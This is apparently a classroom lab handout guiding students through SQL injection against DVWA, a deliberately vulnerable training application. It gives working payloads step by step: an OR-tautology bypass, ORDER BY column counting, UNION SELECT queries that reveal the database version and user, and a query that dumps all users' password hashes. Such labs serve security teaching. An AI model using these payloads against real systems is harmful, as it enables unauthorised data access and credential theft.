Part 2 Executing SQLi Attacks
7. Click the SQL Injection button in the DVWA navigation bar
a. Test to see whether this application was built to handle special characters, enter O’Reilly in the text field and click the ‘submit’ button
b. You should see an error page, this due to a poorly written web page, click the back button.
c. Type a’ OR ‘x’=’x’;# and click submit
d. Take a screen shot of the result
8. Determine how many columns are in the database
a. Type a’ ORDER BY 1;# and click submit. You should not see a result, this means there exists one column in the database.
b. Type a’ ORDER BY 2;# and click submit. You should not see a result, this means there exists at least two columns in the database.
c. Type a’ ORDER BY 3;# and click submit. You should see an error, this means there are two columns in the database.
d. Take a screen shot of the result
9. Determine the name of the database columns
a. Now, let’s try and figure out the names of those columns! Type a’ OR firstname IS NULL;# you should get an error message. This is ok, it means that the column is not called firstname. Let’s try some more.
b. a’ OR first_name IS NULL;# if your result is nothing, this is good! We found the name of the column in the database.
c. Now that we found the name of the column, let’s try and find some usernames in the database. It could be hard to go through a complete list of names, so let’s search people that have a ‘P’ in their name using the LIKE statement: a' OR first_name LIKE '%P%';#
d. Take a screen shot of the result
10. Determine the version of the database
a. Let’s change gears for a moment and see if we can determine the version of the database running. a’ UNION ALL SELECT 1, @@version;#
b. Take a screen shot of the result
c. Attackers can also make use of the Database Administrators account. Try this command to see if we can determine the user account: a’ UNION ALL SELECT system_user(),user();#
d. Take a screen shot of the result
11. Steal the password hashes
a. Time to dump the password hashes of all the users: a' union select null,concat(first_name,0x0a,password) from users;#
b. Take a screen shot of the result